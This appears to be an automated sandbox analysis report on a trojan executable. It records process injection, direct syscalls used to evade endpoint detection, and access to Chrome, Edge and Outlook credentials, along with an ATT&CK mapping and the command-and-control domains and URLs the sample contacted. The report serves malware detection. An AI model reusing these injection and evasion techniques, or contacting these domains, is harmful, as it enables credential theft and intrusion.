                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138674D mov esi, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013507AF mov eax, dword ptr fs:[00000030h]4_2_013507AF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F678E mov eax, dword ptr fs:[00000030h]4_2_013F678E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE7E1 mov eax, dword ptr fs:[00000030h]4_2_013DE7E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014047A0 mov eax, dword ptr fs:[00000030h]4_2_014047A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135C7C0 mov eax, dword ptr fs:[00000030h]4_2_0135C7C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D07C3 mov eax, dword ptr fs:[00000030h]4_2_013D07C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E627 mov eax, dword ptr fs:[00000030h]4_2_0136E627
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01386620 mov eax, dword ptr fs:[00000030h]4_2_01386620
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388620 mov eax, dword ptr fs:[00000030h]4_2_01388620
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135262C mov eax, dword ptr fs:[00000030h]4_2_0135262C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392619 mov eax, dword ptr fs:[00000030h]4_2_01392619
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE609 mov eax, dword ptr fs:[00000030h]4_2_013CE609
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01382674 mov eax, dword ptr fs:[00000030h]4_2_01382674
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136C640 mov eax, dword ptr fs:[00000030h]4_2_0136C640
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013866B0 mov eax, dword ptr fs:[00000030h]4_2_013866B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C6A6 mov eax, dword ptr fs:[00000030h]4_2_0138C6A6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0138A6C7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A6C7 mov eax, dword ptr fs:[00000030h]4_2_0138A6C7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E892B mov eax, dword ptr fs:[00000030h]4_2_013E892B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D892A mov eax, dword ptr fs:[00000030h]4_2_013D892A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]4_2_01348918
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]4_2_01348918
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC912 mov eax, dword ptr fs:[00000030h]4_2_013DC912
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]4_2_013CE908
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]4_2_013CE908
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC97C mov eax, dword ptr fs:[00000030h]4_2_013DC97C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]4_2_013F4978
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]4_2_013F4978
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E mov edx, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0946 mov eax, dword ptr fs:[00000030h]4_2_013D0946
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D89B3 mov esi, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141A9D3 mov eax, dword ptr fs:[00000030h]4_2_0141A9D3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]4_2_013509AD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]4_2_013509AD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]4_2_013829F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]4_2_013829F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE9E0 mov eax, dword ptr fs:[00000030h]4_2_013DE9E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe, for each of the following entries:
                    NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
                    NtQuerySystemInformation: Direct from: 0x76F148CC
                    NtAllocateVirtualMemory: Direct from: 0x76F148EC
                    NtQueryAttributesFile: Direct from: 0x76F12E6C
                    NtReadVirtualMemory: Direct from: 0x76F12E8C
                    NtCreateKey: Direct from: 0x76F12C6C
                    NtSetInformationThread: Direct from: 0x76F12B4C
                    NtClose: Direct from: 0x76F12B6C
                    NtAllocateVirtualMemory: Direct from: 0x76F13C9C
                    NtWriteVirtualMemory: Direct from: 0x76F1490C
                    NtCreateUserProcess: Direct from: 0x76F1371C
                    NtCreateFile: Direct from: 0x76F12FEC
                    NtOpenFile: Direct from: 0x76F12DCC
                    NtQueryInformationToken: Direct from: 0x76F12CAC
                    NtAllocateVirtualMemory: Direct from: 0x76F12BEC
                    NtDeviceIoControlFile: Direct from: 0x76F12AEC
                    NtSetInformationThread: Direct from: 0x76F063F9
                    NtOpenSection: Direct from: 0x76F12E0C
                    NtMapViewOfSection: Direct from: 0x76F12D1C
                    NtResumeThread: Direct from: 0x76F136AC
                    NtCreateMutant: Direct from: 0x76F135CC
                    NtWriteVirtualMemory: Direct from: 0x76F12E3C
                    NtNotifyChangeKey: Direct from: 0x76F13C2C
                    NtProtectVirtualMemory: Direct from: 0x76F07B2E
                    NtProtectVirtualMemory: Direct from: 0x76F12F9C
                    NtSetInformationProcess: Direct from: 0x76F12C5C
                    NtOpenKeyEx: Direct from: 0x76F12B9C
                    NtQueryInformationProcess: Direct from: 0x76F12C26
                    NtResumeThread: Direct from: 0x76F12FBC
                    NtDelayExecution: Direct from: 0x76F12DDC
                    NtReadFile: Direct from: 0x76F12ADC
                    NtQuerySystemInformation: Direct from: 0x76F12DFC
                    NtAllocateVirtualMemory: Direct from: 0x76F12BFC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Section loaded: NULL target: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Thread register set: target process: 6236
                Source: C:\Windows\SysWOW64\tzutil.exe; Thread APC queued: target process: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Process created: C:\Users\user\Desktop\0Wu31IhwGO.exe "C:\Users\user\Desktop\0Wu31IhwGO.exe"
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe; Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: EPnOHZVVNotZ.exe, 00000007.00000000.2235444186.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283547804.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000000.2395335328.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, for each of the following entries:
                    Binary or memory string: Shell_TrayWnd
                    Binary or memory string: Progman
                    Binary or memory string: Progmanlock
                    Binary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Queries volume information: C:\Users\user\Desktop\0Wu31IhwGO.exe VolumeInformation
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\tzutil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\tzutil.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph
ID: 1588148, Sample: 0Wu31IhwGO.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100

• Domain/IP: www.070001325.xyz
    • Signature: Performs DNS queries to domains with low reputation
• Domain/IP: likesharecomment.net
• Domain/IP: 8 other IPs or domains
• Signature: Suricata IDS alerts for network traffic
• Signature: Antivirus detection for URL or domain
• Signature: Multi AV Scanner detection for submitted file
• Signature: 4 other signatures
• Process (started): 0Wu31IhwGO.exe 3
    • File (dropped): C:\Users\user\AppData\...\0Wu31IhwGO.exe.log, ASCII
    • Process (started): 0Wu31IhwGO.exe
        • Signature: Maps a DLL or memory area into another process
        • Process (injected): EPnOHZVVNotZ.exe
            • Signature: Found direct / indirect Syscall (likely to bypass EDR)
            • Process (started): tzutil.exe 13
                • Signature: Tries to steal Mail credentials (via file / registry access)
                • Signature: Tries to harvest and steal browser information (history, passwords, etc)
                • Signature: Modifies the context of a thread in another process (thread injection)
                • Signature: 3 other signatures
                • Process (started): firefox.exe
                • Process (injected): EPnOHZVVNotZ.exe
                    • Domain/IP: likesharecomment.net 3.33.130.190, 49734, 49735, 80 AMAZONEXPANSIONGB United States
                    • Domain/IP: www.expancz.top 107.155.56.30, 49718, 49719, 49720 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK United States
                    • Domain/IP: 4 other IPs or domains
                    • Signature: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
0Wu31IhwGO.exe | 74% | ReversingLabs | Win32.Trojan.Leonem
0Wu31IhwGO.exe | 76% | Virustotal |
0Wu31IhwGO.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.jijievo.site/ao44/ | 0% | Avira URL Cloud | safe
http://www.learnwithus.site/a6qk/ | 0% | Avira URL Cloud | safe
http://www.likesharecomment.net/nqht/ | 0% | Avira URL Cloud | safe
http://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh | 100% | Avira URL Cloud | malware
http://www.070001325.xyz/gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jh | 0% | Avira URL Cloud | safe
https://l3filejson4dvd.josyliving.com/favicon.ico | 0% | Avira URL Cloud | safe
http://www.jijievo.site/ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jh | 0% | Avira URL Cloud | safe
http://www.taxiquynhonnew.click/y49d/ | 100% | Avira URL Cloud | malware
http://www.likesharecomment.net | 0% | Avira URL Cloud | safe
https://dq0ib5xlct7tw.cloudfront.net/ | 0% | Avira URL Cloud | safe
https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.expancz.top | 107.155.56.30 | true | false | | high
www.learnwithus.site | 209.74.77.107 | true | false | | high
all.wjscdn.com | 154.205.156.26 | true | false | | high
dns.ladipage.com | 18.139.62.226 | true | false | | high
www.070001325.xyz | 161.97.142.144 | true | false | | high
likesharecomment.net | 3.33.130.190 | true | true | | unknown
www.epitomize.shop | unknown | unknown | false | | unknown
www.taxiquynhonnew.click | unknown | unknown | false | | unknown
www.jijievo.site | unknown | unknown | false | | high
www.likesharecomment.net | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.jijievo.site/ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jh | true | Avira URL Cloud: safe | unknown
http://www.jijievo.site/ao44/ | true | Avira URL Cloud: safe | unknown
http://www.likesharecomment.net/nqht/ | true | Avira URL Cloud: safe | unknown
http://www.070001325.xyz/gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jh | true | Avira URL Cloud: safe | unknown
http://www.learnwithus.site/a6qk/ | true | Avira URL Cloud: safe | unknown
http://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh | true | Avira URL Cloud: malware | unknown
